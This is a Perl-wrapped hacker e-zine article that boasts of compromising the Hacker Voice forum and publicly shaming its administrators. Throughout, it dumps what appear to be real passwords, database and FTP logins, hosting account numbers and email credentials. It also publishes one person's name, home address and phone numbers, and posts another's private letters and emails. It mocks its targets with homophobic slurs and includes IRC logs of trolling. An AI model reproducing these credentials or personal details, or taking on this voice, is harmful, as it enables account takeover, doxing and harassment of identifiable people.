#!/usr/bin/perl print <<'EOART'; ::::::::::::: #######;; :::::::::::::::::::::::::::: :::::::::::::: #+; :::::::::::::-' `-:::::: ::::::::::::: #;+___ _________ ::' `:::: ::::::::::: #;+ / _ \/ ___/ __ \:' /( /V\ )\ `:: :::::::::: #++ / __/ / / /_/ / / v ___ v \ `: ::::::::: #+# \___/_/ \____/: | __l | : ::::::: ######### ;;;;;;;;; ::: | ___l | : ::::::::::: #+; ::::: \ __ __ / ,: ::::::::::::::: #;+ ____ :_____ \M/ V \M/ ,:: :::::::::::::: ##;;+;;# / __ \/ ___/ ,:::: ::::::::::::: #++ / /_/ / / :`-... ...-::::: :::::::::::: #+# \____/_/ :::`. -'::::: ::::::::::: ### ;;;;;;; ::::::::::`. -':::::: ::::::::::::: #+; ;+; :::::::::::`. -'::::::: ::::::::::::: #;+ +;+ ::::::::::::`. -':::__::: :::::::::::: #;+ +;+ _ ______ ___ ____/ /::: ::::::::::: #++ +#+ | | /| / / __ \/ _ \/ __ /:::: :::::::::: #+# #+# | |/ |/ / / / / __/ /_/ /::::: ::::::::: ####### |__/|__/_/ /_/\___/\__,_/:::::: "Your friendly internet superheroes" S y m a n t i c T h r e a t C o n ---------------------------------- | Level 4: Extreme | | (/////////////////////////////4) | -------------------------------^-- EOART 1; say('Intro'); 2; own('Hackervoice'); 3; say('P64'); 4; own('Cypherxero'); 5; say('ZAP'); 6; own('Whitedust'); 7; say('Unmaskunmask'); 8; own('Clpwn'); 9; say('Interlude'); 10; own('Mil'); 11; say('Scene'); 12; own('Bambenek'); 13; say('CF0'); 14; own('Hellboundhackers'); 15; say('Contact_outro'); sub Intro { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOINTRO' We, the masked crusaders of ZF0, have again returned from the depths of the hackcave to bring justice to some and hope to many. We do the work that civil society is not prepared to do, and in doing so we transcend law and social norms. We're here to keep the internet safe from cretins, knaves, noobs and whitehats. Much has changed behind the production that is ZF0. Some of this has been within our control and some has not. However, we feel that this edition features a noticable increase in the quality of our material. We have invested more time into our articles, as opposed to our previous pattern of essentially dumping past hacks. Additionally we have compromised in part with criticisms about what data we publish and how, while still maintaining the originality and integrity of our zine. We have arranged the articles in a way that the second half of them generally complement the first. In this way your reading pleasure can be easily split into two events. As well, ZF03 is self-extracting. Some of the highlights include our owning of Whitedust et al. in response to our own Call For 0wning, and our thorough owning of HellBound Hackers. With HBH we owned any wankers worth laughing at and then we owned some more. It is a massive article; for that reason alone we placed by the end. This issue is dedicated to fallen comrades. EOINTRO );} sub own { my $pain = "Give me write perms, HAL"; my $dir = 'own'; mkdir $dir, 0700 or die $pain if !-d $dir; &{$_[0]} && return if !$_[1]; open $OWN, '>', "$dir/$_[0].txt" or die $pain; print $OWN $_[1]; close $OWN; } sub say { &own; } sub Hackervoice { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOHACKERVOICE' I first looked up this site in the hunt for the ever media whoring 'psg'. What I found pissed me off enough to take the decision to own it. 'Bringing new life to the UK scene'? The UK scene doesn't need fags like you. You claim to be hackers, you even think you're the leetest things since bread came sliced. Well here's a news flash, your site sucks, your content sucks and receiving RSS feeds of milw0rm doesn't make you a hacker. Your severe lack of respect, intelligence and arrogance has brought you here, and will more than likely bring you here again. I have no doubt you won't learn your lesson, after all, we're just the kiddies who can't code and ./wget milw0rm aren't we? fags. As a side note: any site allowing psg to spout his media whoring bullshit must be owned, cDcnsf - Bite me. ##oh noes DO NOT ATTEMPT TO RUN ANY FORM OF EXPLOIT CODE ON THESE FORUMS. These forums are maintained by seasoned veteran hackers and we make sure all our software is fully patched. No matter what exploit you have, we have patched it and not only will you make a fool of yourself, your account will immediately be closed and WE WILL HUNT YOU DOWN AND MAKE YOUR LIFE MISERABLE. Trust me, it is not worth it. #ph33r Hacker Voice SSH/FTP username: u38618710 password: kGKVCn2X ##changed since rm## HV Blog: Username: 10nix Password: 12ab672 http://www.hackervoice.co.uk/wordpress/wp-login.php (forum) ##content lacking and full of noobs who dream of submitting an XSS to milw0rm## $INFO['sql_driver'] = 'mysql'; $INFO['sql_host'] = 'db114.oneandone.co.uk'; $INFO['sql_database'] = 'db136424260'; $INFO['sql_user'] = 'dbo136424260'; $INFO['sql_pass'] = 'NSBpPtf7'; (admin panel) $db_hostname="db194.oneandone.co.uk"; $db_username="dbo166659147"; $db_password="54MPRV9g"; $db_database="db166659147"; Oh, and what the fuck is phishnet? It stops here and it stops now? What exactly are you going to do? What is the point in your site? // Database^M // Choose the database to be used^M define('XOOPS_DB_TYPE', 'mysql');^M // Table Prefix^M // This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'xoops'.^M define('XOOPS_DB_PREFIX', 'xoops');^M ^M // Database Hostname^M // Hostname of the database server. If you are unsure, 'localhost' works in most cases.^M define('XOOPS_DB_HOST', 'db590.oneandone.co.uk');^M ^M // Database Username^M // Your database user account on the host^M define('XOOPS_DB_USER', 'dbo161539608');^M ^M // Database Password^M // Password for your database user account^M define('XOOPS_DB_PASS', 'DcQveZrA');^M ^M Now where to start with these fags. The admins here don't know their arse from their elbow and want to share that with the world. First up, Belial. Belial has been owned far too many times and doesn't even know about it. Your forum has been backdoored for months and you haven't known, and guess what, no one gives a fuck. Infact the only reason to release this shit is because of your arrogance. <@Blue_Chimp> best way to win a battle is to deny the arsehole seeking a battle, a fight ##wrong, there was no fight, just me lulzing at your asses## <@Be|ia|> yeah h0no started shit they had no just reason to <@Be|ia|> May 12 10:48:41 [camel] they're lame as fuck ##camel lulz## <@Be|ia|> I'd find it really funny if someone pwned my email belial@hackervoice.co.uk / coder69matrix ##that quote is almost too good, heres to the lulz Belial :] And his forum passwords range from anything to do with cheeses really, mind you, the constant waft of cheese he must get everytime he goes for a piss must put cheese on the brain quite a lot. Anyone: ./john -wordlist=cheese.dic Who's next on the list, oh, TeaC :) I bet you where worried you'd be missing out on your chance of f4m3. Teac / Teacish@gmail.com - purplebins1 Name: Daniel Maine Address: 37 Eastry Road Erith Kent ##shit hole DA8 1NW Tel: 01322 448851 Mob: 07725970371 Account Username: digitalsec.co.uk ##ROFL Account Password: purplebins1 DigitalSec is a small company dedicated to providing security assessments at a low cost so that you can feel safer when you're online. ##moment please..L0Lz FTP Settings ftp hostname: ftp.streamline.net (Once domain is transferred/registered ftp Hostname: ftp.digitalsec.co.uk) ftp Username: digitalsec.co.uk ftp Password: purplebins1 host directory: htdocs StreamlineDial Settings For best FTP connectivity we would suggest using our local rate (0844) internet dial up service. Here are the settings: Number: 0844 535 2062 Username: FREE Password: FREE Please note that 0844 dialup is cheaper than normal 0845 services. Catch all E-mail Settings: E-mail address: anything@digitalsec.co.uk (This means literally anything@digitalsec.co.uk, ie sales@ info@ dave@ etc...) E-mail Username: root@digitalsec.co.uk E-mail Password: purplebins1 POP3 (incoming) Hostname: mail.digitalsec.co.uk SMTP (outgoing) Hostname: Provided by your ISP Account Control Panel Settings Account Control Panel Username: digitalsec.co.uk Account Control Panel Password: purplebins1 You can login to your control panel via our website at: http://www.streamline.net/ Account Number: 13372392 Contract Number: 12047670 TomTom.com E-mail address: teacish@gmail.com Password: bluebins1 <-- what is your fascination with bins? Beastnet.org Username: TeaC Password: purplebins hackervoice blog Username: teac Password: e0ed645 http://www.hackervoice.co.uk/wordpress/wp-login.php Yawn. 10nix, your up next :) And was dat hoe i was cybering with really your bitch? her ass is no longer 0day my friend. Nick: 10nix Name: Joshua DiMarco email:hyjnx01@gmail.com/ martini1337 email:joshua.a.simons@gmail.com / martini1337 Login to the Web interface@: https://admin.1and1.com/ Customer ID: 10262299 Password: Martini1337 ftp://www.aspectsgallery.com Login:u39828969 password: martini1337 Your VoipBuster registration details are: Username : hackervoiceradio Password : martini1337 voipuser.org Username : 10nix Password : fvxxc3sy E-mail : 10nix@hackervoice.co.uk Thank you for signing up. Your IPKall phone number is: 425-606-4023 SIP Phone Number: 702092 SIP Proxy: fwd.pulver.com Email: 10nix@hackervoice.co.uk Password: 6353 server name: old.gensortium.com Port: 9022 username: hyjnx passwd: switch2u Login for asterisk is asterisk, password menhir1 Your username is 10nix, and your password is eihzibcoscx I hope your Martini has been suffincently shaken Josh :) h4rh4rh4r, now for some real fun. Who have i missed? SKOBY! (As skoby reads this he probably knows what's coming, and rightly so, I won't dissapoint skoby :).) Well I'll share it with you all, and it's FUNNY shit. I already leaked this stuff to their shitty community when i rm'd the site. Unfortunatly for skoby, this shit is too funny to leave for priv8 lolz. mrskoby@gmail.com / m47at97004a To access UKReg simply go to http://www.ukreg.com, click on one of the member services and enter your username and password which are as follows: Your username is skoby Your password is thoxogo Username: dread-inc Password: m47at97004a Log in at: http://www.cjb.net/ cust num: 9754965 https://admin.1and1.co.uk m47at97004a ACCOUNT INFORMATION: ==================== Plan: TS-20 Package Server IP: 70.85.87.202 Server Port: 8778 Server Address: 70.85.87.202:8778 LOGIN INFORMATION: ================== Control Panel: http://tscp.darkstarllc.com Username: skoby password: m47at97004a BILLING INFORMATION: ==================== http://billing.darkstarllc.com Username: mrskoby@gmail.com password: m47at97004a _______________________________ Blackcode.com User: mrskoby Password: m47at97004a Activation code: 165515647 To access your account with the Control Panel, use the following information: URL: https://cp.hostdone.com:8443/psoft/servlet/psoft.hsphere.CP Login: skoby Password: 5263929 Account ID: 4861 To access your account by FTP, use: Host Name: web.hostdone.com Login: skoby Password: 5263929 ## Not so funny? here you go. Skoby -> Sarah Sarah, Last night when we spoke on the phone, you asked me to open up and talk to you. I couldn't, at least not then. Knowing you now for almost two years has been a fountain of mixed feelings, some brilliant, and some difficult. From when i first met you in college i was crazy about you, when we first met you told me you were single, so naturally, and arrogently, I thought that I had a chance. Then after about i think it was 3/4 weeks, you told me that you were going out with Fraser. I was so devistated, it was like my heart had been ripped out of my chest and stabbed onto the desk. Once you told me how old he was I was so fulled with rage and hatred. The first time we went thru to see him, i had planned to kick the shit out of him and leave him for dead. Only thing that stopped me was knowing that it would probably severly jepordise our friendship, even end it. So that day I bit my tounge and got thru it. Afterwords i just wanted to ask you what the hell you were thinking, i was so discusted that you were with THAT! Anyways, each day went by in college, and as each day went by I started to hurt more and more, when finally I couldn't take any more, I had only one choice, leave college. I couldn't put up with seeing you every day, each day I went home and i just collapsed into a sea of depression and hatred towards him. So I broke off contact, which by the way is the most hardest thing to do, especially when you love someone so intensly. But, i couldn't resist contacting you again and again, because i was scared that you might become more infatuated with Fraser, and Sarah, that's what it was, infatuation and obsession. It was pretty obvious what he was, a discusting pervert, and indeed we now know he is a paedophile as well. But if i said that to you, could you have imagined what your responce would have been?! I couldn't say that to you, I was risking any chance that we might have together. As we spent more time together, I started to love you more and more. Sarah I would have done anything for you, gave you anytime you wanted. I was so wanted to make you happy and I wanted to experiance all the wonderous and joyous things in the world with you. Last year at the airport, wathcing the planes come in, I really thought that day that it would be it, but you quickly put a stop to it, and i let you aswell. I just sat there and said, "Ok, sure no problem". What in the hell was i thinking, i should have pushed and pushed, yet i never, feel such an idiot. Sure nothing might not have happened, but I am so angry at myself for not even trying! After that day, things just got worse and worse... Anyway, cutting past more shitty feelings, and more meetings, we made contact again last month. You told me that you had broke up with Fraser, and you told me what you had found out about him. After you told me on the phone i was physically sick because i never said anything in college. I felt so incredibly bad that i was so selfish and that i only looked out for myself and never said anything, that you ended up getting hurt so badly, by such a monster. Now, here is what i am so incredibly pissed off at. To start, you haved claimed on several occasions that you have had no feelings for me, yet on even more occasions, you have contradicted yourself. To start with, Glasgow airport, sure it was almost an hour of pure passion and i was the happiest guy in the world then. Why in the hell would you have been so passionate with me if you didn't have any feelings at all?? Thats one of the things that I do not get! Also, remember our rather lengthy conversations last September on MSN, about the cockpit fantasies and the such? Back then you admitted that you had feelings for me and that you found me attractive and that you often thought about me. Its a shame i still dont have the chat logs, could have refreshed your memory. And another occasion, one more recent, where you admitted to me when we were sitting by the clyde that if i made a move in college that you would have acted on it because you said and I quote, "I really fancied you back then, and I still do". Now i know that fancing someone and having feelings about them are two different things Sarah, but maybe you could explain last Tuesday for me?? We were in your living room, and we were telling each other how we felt, eventually i couldn't take any more and i kissed you. The look on your face was so incredible. You even said that you were happy that I did that, whys that I wonder? And why did you keep kissing me back, and why did you even want me to get more closer, and you know what i'm talking about. But then the next morning i recieved an email entitled, "Uh oh" saying that, "I have been thinking about last night, and i think it would be best if we stayed friends until a good few months". I was so incredibly ill and sick that day, was so unfair. Ok, why would you want to mess with my head like that? Its pretty obvious that you have feelings for me yet your too afraid to admit them! Sarah, i wish you wouldn't keep messing me around, one day i'm on top of the world because the girl that i have been so madly in love with for nearly 2 years has finally opened up and she feels the same way, and the next day im so incredibly heartbroken and devistated because your just throwing everything back into my face. You have NO IDEA how hard it has been! I have held out hope for you for so long because i loved you so much, but now i fail to see what the point is. Sure Sarah, we can still be the best of friends, and I could keep putting on a show, making everything seem as if it is alright, but I cant. Its just got to the stage now where everything that we've went thru is just destroying me, its killing me. And another thing that hurt and angered me, last night so said on the phone that i wasn't your type?! So what is?! 30 year old 18 stone perverted paedophiles?! One of the things your longing for is for someone to really love you after you've went thru, your mum tells me how you feel. Well Sarah there is someone out there who can truly love you, and appreciate you for how special you really are. Sure theres probably more than one, but i doubt you'll ever find anyone who could love you in the way that I do. I'd just like to say these last final words. Always act on your heart, not your head, and stop trying to analyse life and just live it. I know i shouldn't be, but i'm still hoping that you change your mind, its something that I cannot help, i'm only human. If you do, let me know sooner than later. If you have any feelings, no matter how small then act on them. If you dont, then dont email me back, i'll already know. :( And in that case, i'll hopefully see you when i'll return from America. Gordon Sarah Mathieson to Skoby show details 6/18/05 I just want to thank you for keeping your phone on and meeting me today. I knew i could rely on you. Well Gordon, im not taking anymore of my so called friends letting me down, and yes I AM angry. If its not Pamela its you. Tomorrow is your last chance to meet me or we can just forget about everything, i am sick and tired of being let down without notice and being the "bad one" I have called and called your house and there has been no response. Call me tonight if you want to arrange to meet, if i dont hear anything then i know where i stand. Sarah Skoby -> Sarah WTF DO YOU THINK YOUR UP TO?! First off I am not wasting my life away, IF I WAS WOULD I HAVE APPLIED TO OVER 20 UNIVERSITES ALL OVER THE UK AND AMERICA TO STUDY FOR A PHD IN COMPUTER SCIENCE?! Sarah -> Skoby No excuse me who was the one who never phoned me? i told you to leave your phone on to contact me, i've also asked you repeatedly to phone me but i dont know whats wrong with me. Why didn't you tell me you weren't going to meet me? i went home early thinking you were going to meet me. Skoby -> Sarah Sarah I'm going to the bridges, if you love them so much then you know where they are, but i'm not going. And what is it with you wanting to get a double hotel room, thats just a bit weird dont ya think? Do me a big favour, dont contact me again and dont call the house when I get back, if you do i'll just block incoming calls from your numbers. Sarah -> Skoby Sorry? Im sorry Gordon, but the only reason i asked was because you said yes. If you didnt want to then you shoud have said so. Why are you mad at me? Sarah Sarah->Skoby Im just a bit shocked at why you've sent me this hurtful email when on msn you were happy to talk to me. Whats going on? Can you explain why? Skoby -> Sarah I dont have to because i dont need to, nor do I want to. Just leave me alone Sarah, ok? Sarah -> Skoby You wont need to block me because i wont be in contact anymore. Sarah Poor Skoby, not only are you an emo fag, now everyone knows that you're an Emo fag. Get out of the scene and stay out the scene. We need to keep sites like this off the net. And to all the members of this site, if you feature in this zine, you know whose fault it is? Ours? no. Belial and all the other admins i featured above have been letting you log into a backdoored forum for a long time. I didn't even backdoor it and managed to find it. So Skoby/Belial/TeaC i hope you're happy with your new found fame, something which you've been after for along now, now get the fuck out of the scene, especially you skoby. Sites like this really do piss me off, but not as much as when I irc'd with these people, their lack of knowledge astounds me, especially when they think they are the bee's knees. News Flash: You fake scene whoring pieces of shit can bite me, you're lucky I didn't release all the irc logs of you fags. Btw, your irc servers are owned and sniffed and also, Vesalius, your homebox is backdoored, and I have your address. <@Be|ia|> i mean pr0j3t g4yh4m ##oh dear, WHITEHAT. Ok, with the main ownage over, lets check out some more IRC logs of these noobs being owned left right and centre :) First up, naxxtor being SE'd: 01:12:11 -!- m4tr1x [m4tr1x@thv-1D1E76BC.cpucafe.com] has joined #hvr ##MATRIX IS ME :D 01:12:56 < m4tr1x> hello 01:13:16 < naxxtor> hihi 01:13:40 <+Funsox> hi 01:14:01 < m4tr1x> i have been learning to hack 01:14:11 < m4tr1x> and found your site 01:14:19 < naxxtor> ah excellent 01:14:22 <+Funsox> Sounds good so far 01:14:38 < naxxtor> you on the forums yet m4tr1x ? 01:15:15 < m4tr1x> i didnt listen 2 ur show yet though, becos i dont want to go over my internets cap 01:15:23 < m4tr1x> no i am not on the forums yet 01:15:32 < naxxtor> fair enough 01:15:45 < pingu> i will sign up :D 01:16:18 < naxxtor> good plan 01:16:36 < naxxtor> that way i can validate you guys now rather than you having to wait till tomorow 01:16:43 < pingu> yay 01:17:23 < pingu> hackersvoice.co.uk? 01:17:37 < pingu> oh hackervoice 01:17:39 < m4tr1x> i want to learn to use rpcdcom hack tool 01:17:59 < naxxtor> forums.hackervoice.co.uk 01:18:07 < naxxtor> hmm, hack tool - sounds skiddyish to me! ## I THOUGHT ID SPEAK ON YOUR LEVEL 01:18:24 < m4tr1x> http://milw0rm.com/exploits/61 01:18:28 < naxxtor> you talking about the RPC buffer overflow exploit 01:18:35 < m4tr1x> i tried putting the lines into the run box but it didnt work ##LOL 01:18:45 < naxxtor> milw0rm.com [2003-07-21] 01:18:52 * naxxtor stifles a laugh ##I WAS ALL OUT LOLING 01:18:55 < pingu> :( 01:18:56 < naxxtor> no, that wouldn't work 01:19:05 < naxxtor> you need to compile it 01:19:50 < m4tr1x> i believe my friend can be hacked with it 01:19:56 < m4tr1x> and my school 01:20:01 <+Funsox> hmmm 01:20:13 < naxxtor> they using XP SP1? 01:20:24 < naxxtor> http://msdn.microsoft.com/vstudio/express/visualc/ <-- you'll need something like that 01:20:29 < m4tr1x> they run windows XP yes 01:20:30 < naxxtor> a C/C++ compiler 01:20:40 < naxxtor> that exploit was patched a LONG time ago 01:20:54 < pingu> what if they dont have any service packs at all? 01:21:10 < naxxtor> hmm, depends 01:21:26 < naxxtor> if they've been updating just not adding the SP's 01:21:32 < pingu> right 01:21:32 < naxxtor> which is a bit stupid really 01:21:38 < pingu> :] 01:21:46 < pingu> i see 01:22:39 < naxxtor> btw 01:22:47 * naxxtor points at the forum rules (which also apply here) 01:22:47 < naxxtor> Do not ask us to hack anything for you. We will not tell you how to compromise your ex-girlfriend's e-mail account and we will not do it for you. Nor will we help you deface you school's website or get root on your school's network. If you want to do any of these type of things then it is your own business and we don't want want to know about it. 01:23:04 -!- Funsox [god@thv-79552261.bmly.cable.ntl.com] has quit [Ping timeout] 01:23:05 < pingu> dont worry! :) 01:23:22 < m4tr1x> is it ok to use hack tool on hackervoice then lmfao lmfao 01:23:40 < naxxtor> ha haaa no 01:24:03 < naxxtor> you've not seen what we've done to the nob heads who have done that in the past ##BRING IT ON NIG 01:24:25 < m4tr1x> :( 01:24:39 < m4tr1x> dont hack me 01:24:41 < pingu> may i ask what you did? 01:24:48 < naxxtor> you may ask 01:24:57 < pingu> what did you do? :b 01:25:00 < naxxtor> but i probably won't give a satisfactory answer 01:25:11 < naxxtor> we caused them greif #SHIT 01:25:13 < pingu> oh okay 01:25:19 < pingu> fair enough 01:26:28 < m4tr1x> i did php exploit on a website once 01:26:32 < m4tr1x> from milw0rm 01:26:39 < m4tr1x> do you know how to hack google 01:26:42 < m4tr1x> i read how to 01:30:11 < naxxtor> hack google? 01:30:19 < m4tr1x> you do it like this 01:30:22 < m4tr1x> inurl 01:30:24 < m4tr1x> and stuff 01:30:33 < naxxtor> are you talking about google hacking 01:30:34 < m4tr1x> you can even find mp3's using it 01:30:38 < m4tr1x> hacking google 01:31:06 < naxxtor> ohh yeah 01:31:18 < naxxtor> that's not really hacking google 01:31:27 < naxxtor> well, i guess it is a sort of hack ##YEAH! 01:31:59 < m4tr1x> could you hack me naxxtor 01:32:13 < naxxtor> i don't know :p ## NO 01:32:23 < naxxtor> i don't particularly want to try 01:32:30 < naxxtor> well... 01:32:34 < naxxtor> i can do this .... 01:32:40 -!- m4tr1x [m4tr1x@thv-1D1E76BC.cpucafe.com] has left #hvr [Left all channels] 01:32:43 < naxxtor> :p 01:32:45 < pingu> hahaa 01:32:51 -!- m4tr1x [m4tr1x@thv-1D1E76BC.cpucafe.com] has joined #hvr [00:33] i don't even need to force him :p [00:33] as you can see [00:33] that usually makes people part all the channels they're currently on [00:33] did you think of that [00:33] i just put #0,0 in milworm search [00:33] kinda #hrm.. [00:33] no results [00:34] it's not really an exploit [00:34] it's just a quirk in the way most IRC clients work [00:34] thats stupid [00:34] yeah, it is :p [00:34] why dont the developers of the clients fix that? [00:34] i think i saw that happen on the film swordfish ## LOL [00:34] a guys got all his internet explorers closed or something [00:34] ....... i didn't know they used IRC in swordfish ........ [00:35] i like your nickname naxxtor [00:35] what is your password [00:35] lol [00:35] you think i have ONE password? ## right now i was so tempted to paste his pw, but refrained for the lulz [00:35] also, you assume it's a word? [00:36] what do you mean [00:36] like numbers and stuff like my name [00:36] it's a bit better than that [00:37] it includes letters upper and lower case [00:37] numbers [00:37] symbols [00:37] non printable characters [00:38] is that a printer exploit [00:38] um [00:38] ???? [00:38] do you see those? [00:39] they are rectangles [00:39] exactly [00:39] its like on the matrix [00:39] lol [00:39] when the things come down the screen [00:39] they've all got codes [00:39] do you use COMMAND.COM [00:39] try holding alt and typing some numbers on the numpad [00:39] i use bash ;) [00:40] whats bash [00:40] * m4tr1x slaps naxxtor around a bit with a large trout [00:40] a shell [00:40] for linux [00:41] what is linux [00:41] it's an operating system [00:41] www.debian.org [00:41] like VISTA [00:42] yes, only way less crap [00:42] do u use this [00:42] debian [00:42] yep [00:42] hahhahaha it sounds like an alien ##LOL [00:42] it does? [00:42] BOW TO ME EVIL DEBIAN [00:42] there is a program for debian called alien [00:43] lol [00:43] debian aint evil [00:43] * Funsox has joined #hvr [00:43] how can i find out what debian is like [00:43] how do i get a SHELL [00:43] let me see [00:44] 'Windows cannot find 'BASH' [00:44] it didnt work inthe run box [00:44] LOL no windows wouldn't [00:44] mmkay [00:44] wanna know what debian is like? [00:45] yeah [00:45] http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html # HERE WE GO [00:45] download the file called putty.exe [00:45] ok [00:45] i hope its not spyware [00:45] i run adaware 3 times a week you know [00:45] lol no, it's not adware [00:46] i'm running it right now [00:46] * Funsox has quit IRC (Ping timeout) [00:46] ok i got it [00:46] right [00:46] run it [00:46] yes [00:46] in the box type in home.naxxtor.com [00:46] yeah [00:47] got a black box up asking for a password? [00:47] username: [00:47] your username is m4tr1x [00:47] ok [00:47] check PMs for your password ##private messages [00:47] password is password ## EL8 [00:47] ok [00:47] wait [00:47] my mum is shouting [00:47] brb [00:47] lol ok [00:48] its late you see [00:48] 00:48 here [00:48] i might have to go [00:48] yes, it is quite [00:48] can i coem back here [00:48] it's 00:48 here too [00:48] i don't see why not [00:48] il leave mirc running wil those instruction work tomorrow [00:48] should do [00:49] bear in mind i'm going to be watching you very closely, so don't try any funny stuff without telling me first [00:49] haha are you scared my dcom exploit would work ##LOL [00:49] on that machine? lol no [00:49] why not [00:50] because it's running linux [00:50] which doesn't have dcom at all [00:50] oh [00:50] il read about linux at school tomorrow at lunch [00:50] good plan [00:50] but you've got a shell to play with nos [00:50] *now [00:50] thank you [00:50] no probs [01:21] i am back [01:21] i just tried the putty program [01:21] but it says something about " DNS LOOK UP " [01:21] and a red box [01:23] ok hang on a second [01:23] my dns is borked [01:23] what does dns stand for [01:23] 212.159.18.135 [01:23] Domain Name Server [01:24] what are those numbers [01:24] it's an IP [01:24] it tells your computer where mine is [01:24] oh ok [01:24] do i put it in the box [01:24] when i click open [01:24] yes [01:25] thank you, anyway i gotta go now. i alraedyt had to sneak back onto the pc [01:25] lol ok [01:26] iv hidden putty.exe in a folder in the C:\windows area [01:26] nice hiding [01:26] if you put it in system32 [01:26] thanks [01:26] you can open the run box [01:26] and type putty [01:26] and it'll start [01:26] il see if i can find that folder [01:26] thank you, i will try and talk to you tomorrow [01:26] good night [01:26] night As you can see, naxxtor is an idiot. Now moving on me dropping passwords in their channel..check it :D ### This is the after effects of trolling, dropping them their own pw's. 13:16 -!- l0l [l0l@thv-391E977F.offline.net] has joined #hvr 13:16 -!- Topic for #hvr: HA - CKER VOICE RADIOOOO | #brumhv..EVERYONE LEAVE BIRMINGHAM!!! | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | we should have sajoin'd shaggstar and jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | i am jealous of your life 13:16 -!- Topic set by Vesalius [] [Wed May 9 13:02:01 2007] 13:16 [Users #hvr] 13:16 [~Be|ia| ] [@muftak ] [+BOfH ] [+Katje ] [+n0x ] [+Zakolus] 13:16 [~naxx2 ] [@oOJINxOo_] [+BOT ] [+Large ] [+psg ] [ mxn ] 13:16 [~naxxtor ] [@shaman ] [+Crypt ] [+lohapuk ] [+Seadog ] 13:16 [&SHAGGSTaRR] [@TeKitty ] [+cybereagle] [+MITKitty] [+Timboss] 13:16 [&Vesalius ] [@zinya- ] [+DesertRose] [+MuNk ] [+x4e ] 13:16 -!- Irssi: #hvr: Total of 27 nicks [5 ops, 0 halfops, 16 voices, 6 normal] 13:16 -!- Channel #hvr created Mon Feb 19 17:50:51 2007 13:16 -!- Irssi: Join to #hvr was synced in 1 secs 13:16 <+cybereagle> i thought i found his name address telephone and email. but that was for an italian. boo :( 13:16 <@zinya-> did you ever bully anyone when you were younger psg? 13:16 -!- mode/#hvr [+v l0l] by Vesalius 13:16 <+cybereagle> oh boy 13:16 <+cybereagle> here we go 13:17 <+Large> guys i think i have worked out how to transmit teletext we want to a whole county in the uk, but of course this is illegal and we would not do it 13:17 <+psg> cybereagle: how do you know he isn't italian? 13:17 <+Zakolus> who the fuck is l0l? 13:17 <&Vesalius> Large, yes "we" "wouldn't" 13:17 <+cybereagle> psg: i dont for sure, but his ip was american 13:17 <+cybereagle> and i didnt wanna look an ass 13:17 <+cybereagle> :P 13:17 <+cybereagle> i could prob find out with more googling 13:18 <+cybereagle> apparently, he was known for his rants and outburts on another community 13:18 <+l0l> Zakolus: hm? 13:18 <&Vesalius> oh noes 13:18 <+l0l> obviously some guy new to this channel 13:18 <&Vesalius> he might rm my machine 13:18 <+Zakolus> okayy.. 13:18 -!- Jordan [Jordan@thv-189B68CB.bagu.broadband.ntl.com] has joined #hvr 13:18 -!- mode/#hvr [+v Jordan] by ChanServ 13:18 <+Zakolus> hey Jordan 13:18 <&SHAGGSTaRR> gb2msn 13:18 <&SHAGGSTaRR> j/k :P 13:18 <&Vesalius> not as if he rms it'll be fun 13:18 <+cybereagle> you should let him, it will be fucking funny going over the logs to see how noobily he went about the process of pwning ##LOL 13:18 <&Vesalius> *won't 13:19 <+Jordan> Hey Zak Hey everyone 13:19 <&Vesalius> cybereagle, also I enjoy reinstalling =] 13:19 <+cybereagle> ok, thats a little odd 13:19 <+cybereagle> lol 13:19 <+Zakolus> XD 13:19 <+Zakolus> Reinstall fetish 13:19 <+DesertRose> wow 13:19 * DesertRose just read up 13:19 <+DesertRose> what a frigging asshole 13:19 <&Vesalius> FFS 13:19 <&SHAGGSTaRR> OOH BABY I LOVE HOW YOU SLIP INTO MY FRESHLY FORMATED PARTITIONS 13:19 <&SHAGGSTaRR> XD 13:19 <+DesertRose> see, dinner is always badly timed when I'm on irc 13:19 <+Zakolus> XD 13:20 <+DesertRose> lmfao Shagg 13:20 <+Zakolus> afk for some fewd 13:20 <&SHAGGSTaRR> I've just finished my slasa source so I have no dip for the pringles 13:20 <&SHAGGSTaRR> Not a happy bunny =/ 13:20 <&SHAGGSTaRR> No wait, not even a bunny, what am I on about? 13:21 <+Jordan> lol ermm wonder if i have new pringles i ate some last night texas bbq sauce flavour nice 13:21 <&SHAGGSTaRR> I wish I had those instead of sour cream and onion 13:21 <+Zakolus> msn = htek? 13:21 <+Jordan> go buy some then theyre nice 13:21 <+Zakolus> l0l* 13:22 <&SHAGGSTaRR> oh yeah how was prom dude? 13:22 <+l0l> Zakolus: i dont think so. are you stalkin me dude? 13:22 <+Zakolus> ... 13:22 <+Jordan> is that me shagg? if so amazing 13:22 <&SHAGGSTaRR> yeah you obviously 13:22 <+Zakolus> No, we just had someone come in here making threats, and you could possibly be them 13:23 <+Jordan> oh lol its not me 13:23 * Jordan hides 13:23 <&SHAGGSTaRR> I found that word I couldnt remember 13:23 <+l0l> no worries, aint me 13:23 <&SHAGGSTaRR> consistant 13:23 <+Zakolus> ah. okay. 13:23 <&SHAGGSTaRR> I was sat here thinking of nothing and it just hit me 13:23 <&SHAGGSTaRR> I hate it when things like that happen 13:23 <+cybereagle> i love it but i hate it 13:23 <+cybereagle> its funny as hell 13:23 <+cybereagle> but it also frustrates me 13:23 -!- _hyper_ [hyper@members.hackervoice.co.uk] has joined #hvr 13:23 -!- mode/#hvr [+oa _hyper_ _hyper_] by ChanServ 13:23 <&SHAGGSTaRR> I sat here thinking "FUCK, THIS WORD IS STOPPING ME GETTING WORK DONE HERE.. WHAT COULD IT BE" 13:24 <+DesertRose> I hate that... it's soo counter-productive 13:24 <&SHAGGSTaRR> 20 mins of irc and some pringles later "CONSISTANT" "Where'd that come from???!" 13:24 <&Vesalius> lol 13:24 <&Vesalius> * htek has quit (User has been permanently banned from THVNet (nope)) 13:24 <&SHAGGSTaRR> 'lo hype/viper 13:24 <&SHAGGSTaRR> hyper* 13:24 <&Vesalius> Be|ia|, naxxtor, you might want to update the forums ##0D4Y 13:25 <&_hyper_> to what? 13:25 <&SHAGGSTaRR> there's a moose 13:25 <&SHAGGSTaRR> loose 13:25 <&SHAGGSTaRR> in the hoose 13:25 